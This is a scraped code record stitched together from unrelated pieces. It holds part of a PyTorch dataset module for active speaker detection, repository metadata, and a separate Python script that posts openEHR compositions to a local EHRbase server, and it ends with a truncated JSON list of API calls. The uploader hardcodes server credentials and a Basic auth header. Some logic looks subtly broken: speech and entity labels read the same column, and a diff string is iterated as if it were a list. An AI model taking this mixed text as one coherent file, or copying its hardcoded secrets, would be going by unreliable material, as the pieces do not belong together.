def _postprocess_speech_label(self, speech_label):
speech_label = int(speech_label)
if speech_label == 2: # Remember 2 = SPEAKING_NOT_AUDIBLE
speech_label = 0
return speech_label
def _postprocess_entity_label(self, entity_label):
entity_label = int(entity_label)
if entity_label == 2: # Remember 2 = SPEAKING_NOT_AUDIBLE
entity_label = 0
return entity_label
def _cache_entity_data(self, csv_file_path):
entity_set = set()
csv_data = io.csv_to_list(csv_file_path)
csv_data.pop(0) # CSV header
for csv_row in csv_data:
video_id = csv_row[0]
entity_id = csv_row[-3]
timestamp = csv_row[1]
speech_label = self._postprocess_speech_label(csv_row[-2])
entity_label = self._postprocess_entity_label(csv_row[-2])
minimal_entity_data = (entity_id, timestamp, entity_label)
# Store minimal entity data
if video_id not in self.entity_data.keys():
self.entity_data[video_id] = {}
if entity_id not in self.entity_data[video_id].keys():
self.entity_data[video_id][entity_id] = []
entity_set.add((video_id, entity_id))
self.entity_data[video_id][entity_id].append(minimal_entity_data)
#Store speech meta-data
if video_id not in self.speech_data.keys():
self.speech_data[video_id] = {}
if timestamp not in self.speech_data[video_id].keys():
self.speech_data[video_id][timestamp] = speech_label
#max operation yields if someone is speaking.
new_speech_label = max(self.speech_data[video_id][timestamp], speech_label)
self.speech_data[video_id][timestamp] = new_speech_label
return entity_set
def _cache_entity_data_forward(self, csv_file_path, target_video):
entity_list = list()
csv_data = io.csv_to_list(csv_file_path)
csv_data.pop(0) # CSV header
for csv_row in csv_data:
video_id = csv_row[0]
if video_id != target_video:
continue
entity_id = csv_row[-3]
timestamp = csv_row[1]
entity_label = self._postprocess_entity_label(csv_row[-2])
entity_list.append((video_id, entity_id, timestamp))
minimal_entity_data = (entity_id, timestamp, entity_label) # sfate to ingore label here
if video_id not in self.entity_data.keys():
self.entity_data[video_id] = {}
if entity_id not in self.entity_data[video_id].keys():
self.entity_data[video_id][entity_id] = []
self.entity_data[video_id][entity_id].append(minimal_entity_data)
return entity_list
def _entity_list_postprocessing(self, entity_set):
print('Initial', len(entity_set))
# filter out missing data on disk
all_disk_data = set(os.listdir(self.video_root))
for video_id, entity_id in entity_set.copy():
if entity_id not in all_disk_data:
entity_set.remove((video_id, entity_id))
print('Pruned not in disk', len(entity_set))
self.entity_list = sorted(list(entity_set))
class AudioVideoDatasetAuxLosses(CachedAVSource):
def __init__(self, audio_root, video_root, csv_file_path, clip_lenght,
target_size, video_transform=None, do_video_augment=False):
super().__init__()
# Data directories
self.audio_root = audio_root
self.video_root = video_root
# Post-processing
self.video_transform = video_transform
self.do_video_augment = do_video_augment
# Clip arguments
self.clip_lenght = clip_lenght
self.half_clip_length = math.floor(self.clip_lenght/2)
self.target_size = target_size
entity_set = self._cache_entity_data(csv_file_path)
self._entity_list_postprocessing(entity_set)
def __len__(self):
return int(len(self.entity_list)/1)
def __getitem__(self, index):
#Get meta-data
video_id, entity_id = self.entity_list[index]
entity_metadata = self.entity_data[video_id][entity_id]
audio_offset = float(entity_metadata[0][1])
mid_index = random.randint(0, len(entity_metadata)-1)
midone = entity_metadata[mid_index]
target = int(midone[-1])
target_audio = self.speech_data[video_id][midone[1]]
clip_meta_data = cu.generate_clip_meta(entity_metadata, mid_index,
self.half_clip_length)
video_data, audio_data = io.load_av_clip_from_metadata(clip_meta_data,
self.video_root, self.audio_root, audio_offset,
self.target_size)
if self.do_video_augment:
# random flip
if bool(random.getrandbits(1)):
video_data = [s.transpose(Image.FLIP_LEFT_RIGHT) for s in video_data]
# random crop
width, height = video_data[0].size
f = random.uniform(0.5, 1)
i, j, h, w = RandomCrop.get_params(video_data[0], output_size=(int(height*f), int(width*f)))
video_data = [s.crop(box=(j, i, w, h)) for s in video_data]
if self.video_transform is not None:
video_data = [self.video_transform(vd) for vd in video_data]
video_data = torch.cat(video_data, dim=0)
return (np.float32(audio_data), video_data), target, target_audio
class AudioVideoDatasetAuxLossesForwardPhase(CachedAVSource):
def __init__(self, target_video, audio_root, video_root, csv_file_path, clip_lenght,
target_size, video_transform=None, do_video_augment=False):
super().__init__()
# Data directories
self.audio_root = audio_root
self.video_root = video_root
# Post-processing
self.video_transform = video_transform
self.do_video_augment = do_video_augment
self.target_video = target_video
# Clip arguments
self.clip_lenght = clip_lenght
self.half_clip_length = math.floor(self.clip_lenght/2)
self.target_size = target_size
self.entity_list = self._cache_entity_data_forward(csv_file_path, self.target_video )
print('len(self.entity_list)', len(self.entity_list))
def _where_is_ts(self, entity_metadata, ts):
for idx, val in enumerate(entity_metadata):
if val[1] == ts:
return idx
raise Exception('time stamp not found')
def __len__(self):
return int(len(self.entity_list))
def __getitem__(self, index):
#Get meta-data
video_id, entity_id, ts = self.entity_list[index]
entity_metadata = self.entity_data[video_id][entity_id]
audio_offset = float(entity_metadata[0][1])
mid_index = self._where_is_ts(entity_metadata, ts)
midone = entity_metadata[mid_index]
gt = midone[-1]
clip_meta_data = cu.generate_clip_meta(entity_metadata, mid_index,
self.half_clip_length)
video_data, audio_data = io.load_av_clip_from_metadata(clip_meta_data,
self.video_root, self.audio_root, audio_offset,
self.target_size)
if self.do_video_augment:
# random flip
if bool(random.getrandbits(1)):
video_data = [s.transpose(Image.FLIP_LEFT_RIGHT) for s in video_data]
# random crop
width, height = video_data[0].size
f = random.uniform(0.5, 1)
i, j, h, w = RandomCrop.get_params(video_data[0], output_size=(int(height*f), int(width*f)))
video_data = [s.crop(box=(j, i, w, h)) for s in video_data]
if self.video_transform is not None:
video_data = [self.video_transform(vd) for vd in video_data]
video_data = torch.cat(video_data, dim=0)
return np.float32(audio_data), video_data, video_id, ts, entity_id, gt
#ASC Datasets
class ContextualDataset(data.Dataset):
def get_speaker_context(self, ts_to_entity, video_id, target_entity_id,
center_ts, candidate_speakers):
context_entities = list(ts_to_entity[video_id][center_ts])
random.shuffle(context_entities)
context_entities.remove(target_entity_id)
if not context_entities: # nos mamamos la lista
context_entities.insert(0, target_entity_id) # make sure is at 0
while len(context_entities) < candidate_speakers:
context_entities.append(random.choice(context_entities))
elif len(context_entities) < candidate_speakers:
context_entities.insert(0, target_entity_id) # make sure is at 0
while len(context_entities) < candidate_speakers:
context_entities.append(random.choice(context_entities[1:]))
else:
context_entities.insert(0, target_entity_id) # make sure is at 0
context_entities = context_entities[:candidate_speakers]
return context_entities
def _decode_feature_data_from_csv(self, feature_data):
feature_data = feature_data[1:-1]
feature_data = feature_data.split(',')
return np.asarray([float(fd) for fd in feature_data])
def get_time_context(self, entity_data, video_id, target_entity_id,
center_ts, half_time_length, stride):
all_ts = list(entity_data[video_id][target_entity_id].keys())
center_ts_idx = all_ts.index(str(center_ts))
start = center_ts_idx-(half_time_length*stride)
end = center_ts_idx+((half_time_length+1)*stride)
selected_ts_idx = list(range(start, end, stride))
selected_ts = []
for idx in selected_ts_idx:
if idx < 0:
idx = 0
if idx >= len(all_ts):
idx = len(all_ts)-1
selected_ts.append(all_ts[idx])
return selected_ts
def get_time_indexed_feature(self, video_id, entity_id, selectd_ts):
time_features = []
for ts in selectd_ts:
time_features.append(self.entity_data[video_id][entity_id][ts][0])
return np.asarray(time_features)
def _cache_feature_file(self, csv_file):
entity_data = {}
feature_list = []
ts_to_entity = {}
print('load feature data', csv_file)
csv_data = io.csv_to_list(csv_file)
for csv_row in csv_data:
video_id = csv_row[0]
ts = csv_row[1]
entity_id = csv_row[2]
features = self._decode_feature_data_from_csv(csv_row[-1])
label = int(float(csv_row[3]))
# entity_data
if video_id not in entity_data.keys():
entity_data[video_id] = {}
if entity_id not in entity_data[video_id].keys():
entity_data[video_id][entity_id] = {}
if ts not in entity_data[video_id][entity_id].keys():
entity_data[video_id][entity_id][ts] = []
entity_data[video_id][entity_id][ts] = (features, label)
feature_list.append((video_id, entity_id, ts))
# ts_to_entity
if video_id not in ts_to_entity.keys():
ts_to_entity[video_id] = {}
if ts not in ts_to_entity[video_id].keys():
ts_to_entity[video_id][ts] = []
ts_to_entity[video_id][ts].append(entity_id)
print('loaded ', len(feature_list), ' features')
return entity_data, feature_list, ts_to_entity
class ASCFeaturesDataset(ContextualDataset):
def __init__(self, csv_file_path, time_lenght, time_stride,
candidate_speakers):
# Space config
self.time_lenght = time_lenght
self.time_stride = time_stride
self.candidate_speakers = candidate_speakers
self.half_time_length = math.floor(self.time_lenght/2)
# In memory data
self.feature_list = []
self.ts_to_entity = {}
self.entity_data = {}
# Load metadata
self._cache_feature_data(csv_file_path)
# Parallel load of feature files
def _cache_feature_data(self, dataset_dir):
pool = mp.Pool(int(mp.cpu_count()/2))
files = glob.glob(dataset_dir)
results = pool.map(self._cache_feature_file, files)
pool.close()
for r_set in results:
e_data, f_list, ts_ent = r_set
print('unpack ', len(f_list))
self.entity_data.update(e_data)
self.feature_list.extend(f_list)
self.ts_to_entity.update(ts_ent)
def __len__(self):
return int(len(self.feature_list))
def __getitem__(self, index):
video_id, target_entity_id, center_ts = self.feature_list[index]
entity_context = self.get_speaker_context(self.ts_to_entity, video_id,
target_entity_id, center_ts,
self.candidate_speakers)
target = self.entity_data[video_id][target_entity_id][center_ts][1]
feature_set = np.zeros((self.candidate_speakers, self.time_lenght, 1024))
for idx, ctx_entity in enumerate(entity_context):
time_context = self.get_time_context(self.entity_data,
video_id,
ctx_entity, center_ts,
self.half_time_length,
self.time_stride)
features = self.get_time_indexed_feature(video_id, ctx_entity,
time_context)
feature_set[idx, ...] = features
feature_set = np.asarray(feature_set)
feature_set = np.swapaxes(feature_set, 0, 2)
return np.float32(feature_set), target
class ASCFeaturesDatasetForwardPhase(ContextualDataset):
def __init__(self, csv_file_path, time_lenght, time_stride,
candidate_speakers):
# Space config
self.time_lenght = time_lenght
self.time_stride = time_stride
self.candidate_speakers = candidate_speakers
self.half_time_length = math.floor(self.time_lenght/2)
# In memory data
self.feature_list = []
self.ts_to_entity = {}
self.entity_data = {}
# Single video metdadata
self.entity_data, self.feature_list, self.ts_to_entity = self._cache_feature_file(csv_file_path)
def __len__(self):
return int(len(self.feature_list))
def __getitem__(self, index):
video_id, target_entity_id, center_ts = self.feature_list[index]
entity_context = self.get_speaker_context(self.ts_to_entity, video_id,
target_entity_id, center_ts,
self.candidate_speakers)
feature_set = np.zeros((self.candidate_speakers, self.time_lenght, 1024))
for idx, ctx_entity in enumerate(entity_context):
time_context = self.get_time_context(self.entity_data,
video_id,
ctx_entity, center_ts,
self.half_time_length,
self.time_stride)
features = self.get_time_indexed_feature(video_id, ctx_entity,
time_context)
feature_set[idx, ...] = features
feature_set = np.asarray(feature_set)
feature_set = np.swapaxes(feature_set, 0, 2)
return np.float32(feature_set), video_id, center_ts, target_entity_id
|
fuankarion/active-speakers-context
|
core/dataset.py
|
dataset.py
|
py
| 16,534 |
python
|
en
|
code
| 52 |
github-code
|
6
|
[
{
"api_name": "torch.utils.data.Dataset",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "torch.utils.data",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "random.seed",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "numpy.random.seed",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 26,
"usage_type": "attribute"
},
{
"api_name": "core.io.csv_to_list",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "core.io",
"line_number": 43,
"usage_type": "name"
},
{
"api_name": "core.io.csv_to_list",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "core.io",
"line_number": 77,
"usage_type": "name"
},
{
"api_name": "os.listdir",
"line_number": 104,
"usage_type": "call"
},
{
"api_name": "math.floor",
"line_number": 127,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 142,
"usage_type": "call"
},
{
"api_name": "core.clip_utils.generate_clip_meta",
"line_number": 147,
"usage_type": "call"
},
{
"api_name": "core.clip_utils",
"line_number": 147,
"usage_type": "name"
},
{
"api_name": "core.io.load_av_clip_from_metadata",
"line_number": 149,
"usage_type": "call"
},
{
"api_name": "core.io",
"line_number": 149,
"usage_type": "name"
},
{
"api_name": "random.getrandbits",
"line_number": 155,
"usage_type": "call"
},
{
"api_name": "PIL.Image.FLIP_LEFT_RIGHT",
"line_number": 156,
"usage_type": "attribute"
},
{
"api_name": "PIL.Image",
"line_number": 156,
"usage_type": "name"
},
{
"api_name": "random.uniform",
"line_number": 160,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms.RandomCrop.get_params",
"line_number": 161,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms.RandomCrop",
"line_number": 161,
"usage_type": "name"
},
{
"api_name": "torch.cat",
"line_number": 167,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 168,
"usage_type": "call"
},
{
"api_name": "math.floor",
"line_number": 187,
"usage_type": "call"
},
{
"api_name": "core.clip_utils.generate_clip_meta",
"line_number": 213,
"usage_type": "call"
},
{
"api_name": "core.clip_utils",
"line_number": 213,
"usage_type": "name"
},
{
"api_name": "core.io.load_av_clip_from_metadata",
"line_number": 215,
"usage_type": "call"
},
{
"api_name": "core.io",
"line_number": 215,
"usage_type": "name"
},
{
"api_name": "random.getrandbits",
"line_number": 221,
"usage_type": "call"
},
{
"api_name": "PIL.Image.FLIP_LEFT_RIGHT",
"line_number": 222,
"usage_type": "attribute"
},
{
"api_name": "PIL.Image",
"line_number": 222,
"usage_type": "name"
},
{
"api_name": "random.uniform",
"line_number": 226,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms.RandomCrop.get_params",
"line_number": 227,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms.RandomCrop",
"line_number": 227,
"usage_type": "name"
},
{
"api_name": "torch.cat",
"line_number": 233,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 234,
"usage_type": "call"
},
{
"api_name": "torch.utils.data.Dataset",
"line_number": 237,
"usage_type": "attribute"
},
{
"api_name": "torch.utils.data",
"line_number": 237,
"usage_type": "name"
},
{
"api_name": "random.shuffle",
"line_number": 241,
"usage_type": "call"
},
{
"api_name": "random.choice",
"line_number": 247,
"usage_type": "call"
},
{
"api_name": "random.choice",
"line_number": 251,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 261,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 285,
"usage_type": "call"
},
{
"api_name": "core.io.csv_to_list",
"line_number": 293,
"usage_type": "call"
},
{
"api_name": "core.io",
"line_number": 293,
"usage_type": "name"
},
{
"api_name": "math.floor",
"line_number": 329,
"usage_type": "call"
},
{
"api_name": "multiprocessing.Pool",
"line_number": 341,
"usage_type": "call"
},
{
"api_name": "multiprocessing.cpu_count",
"line_number": 341,
"usage_type": "call"
},
{
"api_name": "glob.glob",
"line_number": 342,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 363,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 374,
"usage_type": "call"
},
{
"api_name": "numpy.swapaxes",
"line_number": 375,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 376,
"usage_type": "call"
},
{
"api_name": "math.floor",
"line_number": 386,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 406,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 417,
"usage_type": "call"
},
{
"api_name": "numpy.swapaxes",
"line_number": 418,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 419,
"usage_type": "call"
}
] |
24957977468
|
#!/usr/bin/python3
'''Post the compositions in a given directory filtered or not by a basename
now one ehr per composition
'''
import json
import logging
import requests
from url_normalize import url_normalize
import sys
import argparse
import os
from typing import Any,Callable
import re
from json_tools import diff
import collections
import uuid
def compare(firstjson:json,secondjson:json)->None:
'''
compare the given jsons
'''
one=flatten(firstjson)
two=flatten(secondjson)
return json.dumps((diff(one,two)),indent=4)
def change_naming(myjson:json)->json:
'''change naming convention on the json'''
return change_dict_naming_convention(myjson,convertcase)
def flatten(d:dict, parent_key:str='', sep:str='_')->dict:
items = []
for k, v in d.items():
new_key = parent_key + sep + k if parent_key else k
if isinstance(v, collections.abc.MutableMapping):
items.extend(flatten(v, new_key, sep=sep).items())
else:
items.append((new_key, v))
return dict(items)
def change_dict_naming_convention(d:Any, convert_function:Callable[[str],str])->dict:
"""
Convert a nested dictionary from one convention to another.
Args:
d (dict): dictionary (nested or not) to be converted.
convert_function (func): function that takes the string in one convention and returns it in the other one.
Returns:
Dictionary with the new keys.
"""
if not isinstance(d,dict):
return d
new = {}
for k, v in d.items():
new_v = v
if isinstance(v, dict):
new_v = change_dict_naming_convention(v, convert_function)
elif isinstance(v, list):
new_v = list()
for x in v:
new_v.append(change_dict_naming_convention(x, convert_function))
new[convert_function(k)] = new_v
return new
def convertcase(name:str)->str:
s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', name)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()
def analyze_comparison(comparison_results:list)->int:
ndifferences=0
for l in comparison_results:
if "add" in l:
if("_uid" in l['add']): #ignore if it is _uid
continue
else:
ndifferences+=1
logging.debug(f"difference add:{l['add']} value={l['value']}")
elif "remove" in l:
ndifferences+=1
logging.debug(f"difference remove:{l['remove']} value={l['value']}")
elif "replace" in l:
if(l['replace'].endswith("time")):
if(l['value'][:18]==l['prev'][:18]):
continue
ndifferences+=1
logging.debug(f"difference replace:{l['replace']} value={l['value']} prev={l['prev']}")
elif(l['value'].startswith('P') and l['value'].endswith('D')):
continue
else:
ndifferences+=1
logging.debug(f"difference replace:{l['replace']} value={l['value']} prev={l['prev']}")
return ndifferences
def create_ehr(client,EHR_SERVER_BASE_URL, auth,patientid):
logging.debug('----POST EHR----')
body1='''
{
"_type" : "EHR_STATUS",
"name" : {
"_type" : "DV_TEXT",
"value" : "EHR Status"
},
"subject" : {
"_type" : "PARTY_SELF",
"external_ref" : {
"_type" : "PARTY_REF",
"namespace" : "BBMRI",
"type" : "PERSON",
"id" : {
"_type" : "GENERIC_ID",
'''
body2=f' "value" : "{patientid}",'
body3='''
"scheme" : "BBMRI"
}
}
},
"archetype_node_id" : "openEHR-EHR-EHR_STATUS.generic.v1",
"is_modifiable" : true,
"is_queryable" : true
}
'''
body=body1+body2+body3
logging.debug(f'body={body}')
# sys.exit(0)
ehrs = client.post(EHR_SERVER_BASE_URL + 'ehr', \
params={},headers={'Authorization':auth,'Content-Type':'application/JSON','Accept': 'application/json','Prefer': 'return={representation|minimal}'},\
data=body)
print(f'create ehr status_code={ehrs.status_code}')
logging.info(f'create ehr: status_code={ehrs.status_code}')
logging.debug(f'ehr url={ehrs.url}')
logging.debug(f'ehrs.headers={ehrs.headers}')
logging.debug(f'ehrs.text={ehrs.text}')
logging.debug(f'ehrs.json={ehrs.json}')
if(ehrs.status_code==409 and 'Specified party has already an EHR set' in json.loads(ehrs.text)['message']):
#get ehr summary by subject_id , subject_namespace
payload = {'subject_id':patientid,'subject_namespace':'BBMRI'}
ehrs = client.get(EHR_SERVER_BASE_URL + 'ehr', params=payload,headers={'Authorization':auth,'Content-Type':'application/JSON','Accept': 'application/json'})
print('ehr already existent')
logging.info('ehr already existent')
logging.debug('----GET EHR----')
print(f'get ehr: status_code={ehrs.status_code}')
logging.info(f'get ehr: status_code={ehrs.status_code}')
logging.debug(f'ehr url={ehrs.url}')
logging.debug(f'ehr.headers={ehrs.headers}')
logging.debug(f'ehr.text={ehrs.text}')
logging.debug(f'ehr.json={ehrs.json}')
ehrid=json.loads(ehrs.text)["ehr_id"]["value"]
print(f'Patient {patientid}: retrieved ehrid={ehrid}')
logging.info(f'Patient {patientid}: retrieved ehrid={ehrid}')
return ehrid
# print(f'ehrheaders={ehrs.headers}')
urlehrstring = ehrs.headers['Location']
ehridstring = "{"+urlehrstring.split("v1/ehr/",2)[2]
ehrid=uuid.UUID(ehridstring)
print(f'Patient {patientid}: ehrid={str(ehrid)}')
logging.info(f'Patient {patientid}: ehrid={str(ehrid)}')
return ehrid
def main():
print('COMPOSITIONS UPLOADER')
parser = argparse.ArgumentParser()
parser.add_argument('--loglevel',help='the logging level:DEBUG,INFO,WARNING,ERROR or CRITICAL',default='WARNING')
parser.add_argument('--inputdir',help='dir containing the compositions',default='RESULTS')
parser.add_argument('--basename',help='basename to filter compositions')
parser.add_argument('--templatename',help='template to use when posting',default='crc_cohort')
parser.add_argument('--check',action='store_true', help='check the missing leafs for leafs that should be there but are not')
args=parser.parse_args()
loglevel=getattr(logging, args.loglevel.upper(),logging.WARNING)
if not isinstance(loglevel, int):
raise ValueError('Invalid log level: %s' % loglevel)
logging.basicConfig(filename='./CompositionUploader.log',filemode='w',level=loglevel)
inputdir=args.inputdir
print(f'inputdir given: {inputdir}')
logging.info(f'inputdir given: {inputdir}')
if not os.path.exists(inputdir):
print(f'directory {inputdir} does not exist')
logging.error(f'directory {inputdir} does not exist')
sys.exit(1)
basename=args.basename
if(basename):
logging.info(f'basename given: {basename}')
print(f'basename given: {basename}')
check=False
if args.check:
check=True
print ('Check is set to true')
logging.info('Check is set to true')
#get the list of files
filelist=[]
if basename:
for file in os.listdir(inputdir):
if file.startswith(basename) and file.endswith(".json"):
logging.debug(f'file added {os.path.join(inputdir, file)}')
filelist.append(file)
else:
for file in os.listdir(inputdir):
if file.endswith(".json"):
logging.debug(f'file added {os.path.join(inputdir, file)}')
filelist.append(file)
# Now sort the list
filelist.sort(key=lambda a: int(a.split('_')[1]))
for i,f in enumerate(filelist):
logging.info(f'file {i+1} = {f}')
# Initialize the connection to ehrbase
EHR_SERVER_BASE_URL = 'http://localhost:8080/ehrbase/rest/openehr/v1/'
EHR_SERVER_BASE_URL_FLAT = 'http://localhost:8080/ehrbase/rest/ecis/v1/composition/'
client = requests.Session()
client.auth = ('ehrbase-user','SuperSecretPassword')
auth="Basic ZWhyYmFzZS11c2VyOlN1cGVyU2VjcmV0UGFzc3dvcmQ="
nfiles=len(filelist)
print(f'{nfiles} to insert')
logging.info(f'{nfiles} to insert')
#check if the template is already in the db
templatename=args.templatename
myurl=url_normalize(EHR_SERVER_BASE_URL + 'definition/template/adl1.4')
response = client.get(myurl,params={'format': 'JSON'},headers={'Authorization':auth,'Content-Type':'application/JSON'})
templates=[a["template_id"] for a in json.loads(response.text)]
if(templatename not in templates):
print(f'Missing template {templatename}')
logging.error(f'Missing template {templatename}')
sys.exit(1)
# loop over files and upload the compositions
myurl=url_normalize(EHR_SERVER_BASE_URL_FLAT)
compinserted=0
compok=0
for i,file in enumerate(filelist):
print(f'********FILE {i+1}/{nfiles} {file}********')
logging.info(f'********FILE {i+1}/{nfiles} {file}********')
filename=os.path.join(inputdir, file)
with open(filename) as json_file:
compositionjson = json.load(json_file)
patientid='Patient'+compositionjson[templatename.lower()+'/context/case_identification/patient_pseudonym']
print(f'Patientid={patientid}')
logging.info(f'Patientid={patientid}')
# create ehr
ehrid=create_ehr(client,EHR_SERVER_BASE_URL, auth,patientid)
# post composition
compositionjson=json.dumps(compositionjson)
response = client.post(myurl,
params={'ehrId':str(ehrid),'templateId':templatename,'format':'FLAT'}, \
headers={'Authorization':auth,'Content-Type':'application/json','Prefer':'return=representation'}, \
data=compositionjson \
)
if(response.status_code != 200 and response.status_code != 201):
print(f"Couldn't post the composition. Error={response.status_code}")
print(f'response.text {response.text}')
logging.info(f"Couldn't post the composition. Error={response.status_code}")
logging.info(f'response.headers {response.headers}')
logging.info(f'response.text {response.text}')
else:
compinserted+=1
print(f'Composition inserted')
compositionUid=json.loads(response.text)["compositionUid"]
print(f'compositionUid={compositionUid}')
logging.info(f'compositionUid={compositionUid}')
if(check):
print(f'checking...')
logging.info(f'checking...')
#get composition created and compare with the one posted
myurlu=url_normalize(EHR_SERVER_BASE_URL_FLAT+compositionUid)
response = client.get(myurlu, \
params={'ehrId':str(ehrid),'templateId':templatename,'format':'FLAT'}, \
headers={'Authorization':auth,'Content-Type':'application/json'}, \
)
if(response.status_code != 200 and response.status_code != 201):
print(f"Couldn't retrieve the composition. Error{response.status_code}")
logging.info(f"Couldn't retrieve the composition. Error{response.status_code}")
logging.info(f'response.headers {response.headers}')
logging.info(f'response.text {response.text}')
else:
origjson=json.loads(compositionjson)
retrievedjson=json.loads(response.text)["composition"]
origchanged=change_naming(origjson)
retrchanged=change_naming(retrievedjson)
comparison_results=compare(origchanged,retrchanged)
ndiff=analyze_comparison(comparison_results)
if(ndiff>0):
print('original and retrieved json differ')
logging.info('original and retrieved json differ')
logging.debug(f'comparison_results:')
logging.debug(comparison_results)
else:
print('original and retrieved json do not differ')
logging.info('original and retrieved json do not differ')
compok+=1
print(f'{compinserted}/{nfiles} compositions inserted successfully')
logging.info(f'{compinserted}/{nfiles} compositions inserted successfully')
print(f'{nfiles-compinserted}/{nfiles} compositions with errors')
if(check):
print(f'{compok}/{compinserted} checked successfully')
logging.info(f'{compok}/{compinserted} checked successfully')
print(f'{compinserted-compok}/{compinserted} checked unsuccessfully')
logging.info(f'{compinserted-compok}/{compinserted} checked unsuccessfully')
if __name__ == '__main__':
main()
|
crs4/TO_OPENEHR_CONVERTER
|
COMPOSITIONS_UPLOADER/CompositionUploader.py
|
CompositionUploader.py
|
py
| 11,566 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "json.dumps",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "json_tools.diff",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "collections.abc",
"line_number": 35,
"usage_type": "attribute"
},
{
"api_name": "typing.Any",
"line_number": 41,
"usage_type": "name"
},
{
"api_name": "typing.Callable",
"line_number": 41,
"usage_type": "name"
},
{
"api_name": "re.sub",
"line_number": 66,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 78,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 81,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 88,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 93,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 97,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 126,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 134,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 135,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 136,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 137,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 138,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 140,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 145,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 146,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 148,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 149,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 150,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 151,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 152,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 154,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 156,
"usage_type": "call"
},
{
"api_name": "uuid.UUID",
"line_number": 162,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 164,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 174,
"usage_type": "call"
},
{
"api_name": "logging.WARNING",
"line_number": 183,
"usage_type": "attribute"
},
{
"api_name": "logging.basicConfig",
"line_number": 186,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 191,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 193,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 193,
"usage_type": "attribute"
},
{
"api_name": "logging.error",
"line_number": 195,
"usage_type": "call"
},
{
"api_name": "sys.exit",
"line_number": 196,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 201,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 208,
"usage_type": "call"
},
{
"api_name": "os.listdir",
"line_number": 215,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 217,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 217,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 217,
"usage_type": "attribute"
},
{
"api_name": "os.listdir",
"line_number": 220,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 222,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 222,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 222,
"usage_type": "attribute"
},
{
"api_name": "logging.info",
"line_number": 229,
"usage_type": "call"
},
{
"api_name": "requests.Session",
"line_number": 235,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 241,
"usage_type": "call"
},
{
"api_name": "url_normalize.url_normalize",
"line_number": 246,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 248,
"usage_type": "call"
},
{
"api_name": "logging.error",
"line_number": 251,
"usage_type": "call"
},
{
"api_name": "sys.exit",
"line_number": 252,
"usage_type": "call"
},
{
"api_name": "url_normalize.url_normalize",
"line_number": 256,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 261,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 262,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 262,
"usage_type": "attribute"
},
{
"api_name": "json.load",
"line_number": 264,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 267,
"usage_type": "call"
},
{
"api_name": "json.dumps",
"line_number": 271,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 280,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 281,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 282,
